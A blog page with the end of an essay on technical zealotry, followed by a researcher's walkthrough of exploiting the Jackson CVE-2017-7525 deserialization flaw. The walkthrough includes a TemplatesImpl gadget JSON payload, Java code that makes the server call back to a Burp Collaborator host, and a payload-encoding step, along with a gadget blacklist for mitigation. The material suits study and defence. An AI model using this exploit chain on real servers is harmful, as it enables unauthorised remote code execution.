I have precious little hope for the future of projects that inspire this type of zealotry, and its continued spread will likely harm real research in this area for many years to come. These are technical projects; some succeed, some fail – this is how technology evolves. Those designing these systems are human, just as flawed as the rest of us, and so too are the projects flawed. Some are well suited to certain use cases and not others, some aren't suited to any use case, none yet are suited to all. The discussions about these projects should be focused on the technical aspects, and done so to evolve this field of research; adding a religious element to these projects harms all.

[Note: There are many examples of this behavior that could be cited, however in the interest of protecting those that have been targeted for criticizing projects, I have opted to minimize such examples. I have seen too many people who I respect, too many that I consider friends, being viciously attacked – I have no desire to draw attention to those attacks, and risk restarting them.]

Exploiting the Jackson RCE: CVE-2017-7525

Earlier this year, a vulnerability was discovered in the Jackson data-binding library – a Java library that allows developers to easily serialize Java objects to JSON and vice versa – that allows an attacker to exploit deserialization to achieve remote code execution on the server. This vulnerability didn't seem to get much attention, and even less documentation. Given that it's an easily exploited remote code execution vulnerability with little documentation, I'm sharing my notes on it.

What To Look For

There are a couple of ways to use Jackson; the simplest, and likely most common, is to perform a binding to a single known object type, pulling the values from the JSON and setting the properties on the associated Java object. This is simple, straightforward, and likely not exploitable. Here's a sample of what that type of document looks like:
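As a minimal illustration (the field names here are invented), a simple binding document is just plain JSON with no type information:

```json
{
  "name": "Bob",
  "age": 25
}
```

Jackson maps each property onto a setter or field of a target class the developer specifies in code; the attacker gets no say in which class is created.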

What we are interested in is a bit different – in some cases[1], you can create arbitrary objects, and you will see their class name in the JSON document. If you see this, it should raise an immediate red flag. Here's a sample of what these look like:
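Again as an illustration (property and class names invented), a document using Jackson's default typing wraps the value in an array whose first element is a fully-qualified Java class name:

```json
{
  "obj": [
    "com.example.SomeClass",
    { "name": "Bob" }
  ]
}
```

That class name string is what makes this dangerous: the attacker, not the developer, chooses which class gets instantiated.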

To determine if it really is Jackson that you are seeing, one technique (if detailed error messages are available) is to provide invalid input and look for references to this package:

  • com.fasterxml.jackson.databind

Building An Exploit

The ability to create arbitrary objects does come with some limitations, the most important of which is that Jackson requires a default (no-argument) constructor, so some things that seem like obvious choices (e.g. java.lang.ProcessBuilder) aren't an option. There are some suggested techniques in the paper from Moritz Bechler; while the technique the paper pushes is interesting (its focus is on loading remote classes from another server), it didn't meet my needs. There are other, simpler options available.

Helpfully, the project gave us a starting point to build an effective exploit in one of their unit tests:
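A sketch of what such a document looks like (the `obj` property name and the Base64 value are placeholders here; the class is the JDK-internal copy of Xalan's TemplatesImpl, a close relative of the org.apache.xalan entry in the blacklist further down):

```json
{
  "obj": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [ "AAIAZQ==" ],
      "transletName": "a.b",
      "outputProperties": { }
    }
  ]
}
```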

This code leverages a well-known 'gadget' to create an object that will accept compiled Java bytecode (via transletBytecodes) and execute it as soon as outputProperties is accessed. This makes for a very simple, straightforward technique to exploit this vulnerability.

We can supply a payload to this to prove that we have execution, and we are done.

Building The Payload

In this case, the goal is to prove that we have execution, and the route I went is to have the server issue a GET request to Burp Collaborator. This can be done easily with the following sample code:
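A minimal sketch of such a payload class follows; the Collaborator hostname is a placeholder. Note that for the TemplatesImpl gadget the class must actually extend the JDK-internal com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet and stub out its abstract transform methods; that parent is omitted here so the sketch compiles on any JDK:

```java
import java.net.HttpURLConnection;
import java.net.URL;

public class Exploit {
    // Hypothetical Burp Collaborator endpoint - replace with your own.
    static final String CALLBACK = "http://example.burpcollaborator.net/";

    // In the real payload this logic lives in the constructor of a class
    // extending AbstractTranslet, since TemplatesImpl only instantiates
    // translet subclasses; the constructor runs as soon as the gadget
    // instantiates the class.
    public Exploit() {
        try {
            HttpURLConnection conn = (HttpURLConnection) new URL(CALLBACK).openConnection();
            conn.setConnectTimeout(3000);
            conn.setReadTimeout(3000);
            conn.getInputStream().close(); // fire the GET; the response is irrelevant
        } catch (Exception e) {
            // Swallow everything - the outbound request is all the proof we need.
        }
    }

    public static void main(String[] args) {
        new Exploit();
    }
}
```

Compile it targeting the same (or an older) Java version as the server, or the class will fail to load before the constructor ever runs.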

This code can be compiled with javac, and the resulting .class file should then be Base64 encoded and provided in the transletBytecodes field of the JSON document. As soon as the document is processed, the server will create the object, load the code, and execute it. You may still see errors from code failing after the payload executes, such as type-mismatches or the like, but by then the code has already run.
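The encoding step can be scripted; a small sketch (the file-name handling is illustrative):

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;

public class EncodePayload {
    // Read a compiled .class file and return its Base64 encoding,
    // ready to drop into the transletBytecodes array of the JSON document.
    static String encode(Path classFile) throws Exception {
        byte[] bytecode = Files.readAllBytes(classFile);
        return Base64.getEncoder().encodeToString(bytecode);
    }

    public static void main(String[] args) throws Exception {
        // Usage: javac Exploit.java && java EncodePayload Exploit.class
        if (args.length > 0) {
            System.out.println(encode(Paths.get(args[0])));
        }
    }
}
```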

Limiting Attack Surface

This is just one technique to exploit this flaw; there are many others available. To mitigate the issue, at least in part, Jackson has been updated with a blacklist of types known to be useful gadgets for this type of attack:

  • org.apache.commons.collections.functors.InvokerTransformer
  • org.apache.commons.collections.functors.InstantiateTransformer
  • org.apache.commons.collections4.functors.InvokerTransformer
  • org.apache.commons.collections4.functors.InstantiateTransformer
  • org.codehaus.groovy.runtime.ConvertedClosure
  • org.codehaus.groovy.runtime.MethodClosure
  • org.springframework.beans.factory.ObjectFactory
  • org.apache.xalan.xsltc.trax.TemplatesImpl
  • com.sun.rowset.JdbcRowSetImpl
  • java.util.logging.FileHandler
  • java.rmi.server.UnicastRemoteObject
  • org.springframework.beans.factory.config.PropertyPathFactoryBean
  • com.mchange.v2.c3p0.JndiRefForwardingDataSource
  • com.mchange.v2.c3p0.WrapperConnectionPoolDataSource

There are likely other types that can be used in similar ways to gain code execution that haven't become well known yet, so this doesn't eliminate the problem – it just makes it less likely.

Required Reading & References

To fully understand this vulnerability, there are a few things that you should read:

[1] To exploit this issue, the user of the library must have enabled Default Typing (mapper.enableDefaultTyping); if this hasn't been done, the exploit described here doesn't work, as you aren't able to create arbitrary objects.